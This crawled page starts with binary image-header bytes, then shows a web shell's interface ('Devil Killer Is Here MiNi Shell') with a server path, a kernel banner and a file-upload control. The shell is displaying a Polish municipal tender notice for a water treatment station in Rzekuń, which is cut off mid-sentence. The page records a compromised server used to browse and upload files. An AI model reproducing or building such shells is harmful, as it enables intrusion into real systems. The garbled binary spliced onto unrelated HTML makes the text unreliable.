JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220314/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220314/0008537901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa stacji uzdatniania wody w gminie Rzekuń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rzekuń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667959</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzekuń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">awierzba@rzekun.net</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzekun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa stacji uzdatniania wody w gminie Rzekuń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46fcd709-a3a1-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00085379</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00049832/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Budowa stacji uzdatniania wody w Dzbeninie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.rzekun.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej.2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na<br/>ePUAP.Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:„Formularz<br/>do złożenia, zmiany,wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 3.Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej ( ePUAP ).4. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”i<br/>„Formularza do komunikacji” wynosi 150 MB.5. Za datę przekazania oferty, wniosków,<br/>zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 6. Zamawiający<br/>przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o<br/>Ochronie Danych (RODO) informujemy, że:<br/>1) Administratorem danych osobowych Wykonawców biorących udział w postępowaniu o udzielenie<br/>zamówienia publicznego jest Urząd Gminy w Rzekuniu, adres: ul. Kościuszki 33, 07-411 Rzekuń;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogę się kontaktować w sprawach<br/>przetwarzania moich danych osobowych za pośrednictwem poczty elektronicznej: ug@rzekun.pl;<br/>3) Administrator będzie przetwarzał Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w<br/>zw. z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych (Pzp) w celu związanym z<br/>prowadzonym postępowaniem o udzielenie zamówienia publicznego;<br/>4) Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów<br/>prawa, a także podmiotom, z którymi Administrator zawarł umowę w związku z realizacją usług na<br/>rzecz Administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrznym audytorem).<br/>Odbiorcami danych będą także osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych (Pzp);<br/>5) Administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej;<br/>6) Mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie Administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Państwa dane osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przypadku<br/>zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej)<br/>przez okres wskazany w wytycznych w zakresie kwalifikowalności wydatków.<br/>2) Przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia<br/>przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych, przy czym:<br/>a. w przypadku obowiązków wynikających z art. 15 ust. 1-3 RODO zamawiający ma prawo żądać od<br/>osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>b. skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>c. prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania. Prawo do ograniczenia przetwarzania danych<br/>osobowych nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania<br/>ze środków ochrony prawnej w celu ochrony praw innej osoby fizycznej i prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>3) Podanie danych osobowych jest dobrowolne, jednakże niezbędne do przeprowadzenia<br/>postępowaniem o udzielenie zamówienia publicznego. Konsekwencje niepodania danych określa<br/>ustawa Pzp. Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa<br/>dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FPZ.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac projektowych oraz robót budowlanych w systemie „zaprojektuj i wybuduj” dla zadania inwestycyjnego pn: „Budowa stacji uzdatniania wody w Dzbeninie”, tj. zaprojektowanie i wybudowanie SUW Dzbenin wraz z uzyskaniem wymaganych przepisami prawa uzgodnień, pozwoleń, decyzji i wszelkich prac budowano montażowych dot. robót opisach w Programie Funkcjonalno- Użytkowym (PFU) oraz nie wymienionych, a koniecznych do prawidłowej realizacji zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej ofertyZamawiający<br/>stosować będzie następujące kryteria oceny ofert. a) Cena – 60 pktb) Okres gwarancji – 40<br/>pkt.2.Ocena ofert zostanie dokonana w następujący sposób:3. Opis kryterium „Cena (cena ofertowa<br/>brutto). a) Kryterium „Cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie<br/>przedmiotu zamówienia wpisanej przez Wykonawcę w pkt. 2 Formularz Oferty. W tym kryterium można<br/>uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po<br/>przecinku.5. Opis kryterium „Okres gwarancji”a) Kryterium „Okres gwarancji” będzie rozpatrywany na<br/>podstawie długości terminu okresu gwarancji zadeklarowanego przez Wykonawcę wpkt. 4. Formularza<br/>Oferty.6.Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego:<br/>60miesięcy.7.Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 72 miesiące.8. Jeżeli<br/>Wykonawca zaproponuje okres gwarancji dłuższy niż 72 miesięcy do oceny ofert zostanie przyjęty<br/>okres 72 miesięcy i taki zostanie uwzględniony w Umowie z Wykonawcą.9. Wykonawca,który zaoferuje<br/>najkorzystniejszy okres (72 miesiące) – otrzymuje 40 pkt - maksymalną liczbę punktów.10.Wykonawca,<br/>który zaoferuje najmniej korzystny okres (60 miesięcy) – otrzymuje 0 pkt.11. W przypadku, gdy wszyscy<br/>Wykonawcy zaproponowali jednakową wartość, wszyscy otrzymują maksymalną liczbę punktów.<br/>Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością<br/>najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów obliczoną wg. Wzoru zawartego w<br/>SWZ UWAGA: • Okres rękojmi jest równy okresowi gwarancji na przedmiot zamówienia.• Brak<br/>określenia w formularzu oferty okresu gwarancji skutkuje odrzuceniem oferty, jako niezgodnej z<br/>warunkami zamówieniami- art. 275 ust. 2 ustawy Pzp. 12. W tych kryteriach łącznie można uzyskać<br/>maksymalnie 100 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po<br/>przecinku.13.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą<br/>liczbępunktów (P)wyliczoną zgodnie z poniższym wzorem:P = C + O Gdzie:P – łączna liczba punktów<br/>oferty ocenianej C –liczba punktów uzyskanych w kryterium „Cena”O – liczba punktów uzyskanych w<br/>kryterium „Okres Gwarancji”14. Zamawiający w przypadku, o którym mowa w art. 275 ust. 2<br/>ustawyPzp, może zaprosić Wykonawców do negocjacji ofert złożonych w odpowiedzi na ogłoszenie o<br/>zamówieniu, jeżeli nie podlegają one odrzuceniu, w zakresie w/w kryteriów oceny ofert o których<br/>mowa w punkcie 1niniejszego paragrafu. 15. Oferta, która otrzyma łącznie największą liczbę punktów<br/>zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą<br/>uzyskanych punktów.Realizacja zamówień zostanie powierzona Wykonawcy, którego oferta<br/>uzyskanajwiększą liczbę punktów.16. W przypadku jednakowej punktacji przy wyborze<br/>najkorzystniejszej oferty Zamawiający będzie dokonywał wybory oferty zgodnie z zapisami art. 248<br/>ustawy Pzp.17. Zamawiający poprawi omyłki, o których mowa w art. 223 usta 2 ustawy Pzp<br/>niezwłocznie powiadamiając o tym fakcie Wykonawcę, którego oferta została poprawiona.18. O<br/>wyborze najkorzystniejszej oferty Zamawiający zawiadomi niezwłocznie wykonawców zgodnie z art.<br/>253 ustawyPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> . Zdolności technicznej lub zawodowej:(określenie warunków):<br/>2.4.1 tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone co najmniej:<br/>- jedną robotę budowlaną polegającą na budowie, rozbudowie stacji uzdatniania wody o wartości co najmniej 2 800 000,00 złotych brutto (słownie: dwa miliony osiemset 00/100 złotych).<br/>2.4.2 tj. dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w tym: <br/>- przynajmniej 1 osoba pełniąca funkcje kierownika budowy branży ogólnobudowlanej;<br/>- przynajmniej 1 osoba pełniąca funkcje kierownika robót mająca uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>- przynajmniej 1 osoba pełniąca funkcje kierownika robót branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>	Każda z ww. osób powinna posiadać co najmniej trzyletnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności: warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami oraz doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności. Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art. 12 a ustawy Prawo budowlane oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego wykazania braku podstaw wykluczenia określonych w niniejszej swz, na<br/>zamawiający żąda następujących dokumentów: 1) Podpisane oświadczenie, o braku podstaw do<br/>wykluczenia –według załączonego wzoru.Wykonawca, w przypadku polegania na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w<br/>pkt.1,także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu - według załączonego wzoru. W stosunku do Wykonawcy, którego oferta<br/>zostanie najwyżej oceniona, Zamawiający w celu potwierdzenia braku podstaw wykluczenia pobierze<br/>samodzielnie odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>wart.125ust.1 ustawy pzp, - w odniesieniu do tych podmiotów Zamawiający pobierze samodzielnie<br/>dokument.Zamawiający pobierze samodzielnie dokument dotyczący podwykonawcy,któremu<br/>Wykonawca zamierza powierzyć wykonanie części zamówienia, a który nie jest podmiotem, na którego<br/>zdolnościach lub sytuacji wykonawca polega na zasadach określonych w art. 125 ust.1. W przypadku<br/>wspólnego ubiegania się o zamówienie –w odniesieniu do tych podmiotów Zamawiający pobierze<br/>samodzielnie dokument. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania po za granicami<br/>Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty<br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,potwierdzające<br/>odpowiednio, że :a)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej przepisach miejsca wszczęcia tej<br/>procedury. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wstępnego potwierdzenia spełniania przez wykonawcę warunków<br/>udziału w postępowaniu określonych w niniejszej swz, zamawiający żąda następujących<br/>dokumentów:1) Podpisane oświadczenie dotyczące spełniania warunków udziału w postępowaniu<br/>według załączonego wzoru.Wykonawca, w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa pkt.1,także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające odpowiednio spełnianie warunków<br/>udziału w postępowaniu,w zakresie, w jakim wykonawca powołuje się na jego zasoby<br/>według załączonego wzoru.Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania,<br/>następujących podmiotowych środków dowodowych,aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych:1) wykazu robót budowlanych wykonanych nie wcześniej niż okresie ostatnich5<br/>lat,licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy -w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane,oraz załączeniem dowodów<br/>określających,czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów -inne odpowiednie dokumenty 